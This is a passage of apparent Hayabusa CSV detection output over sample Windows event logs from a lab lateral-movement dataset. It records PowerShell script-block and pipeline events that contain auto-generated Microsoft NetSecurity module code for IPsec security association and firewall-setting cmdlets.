$InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias 
'*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml 
} Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml 
} Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.861 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] 
param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, 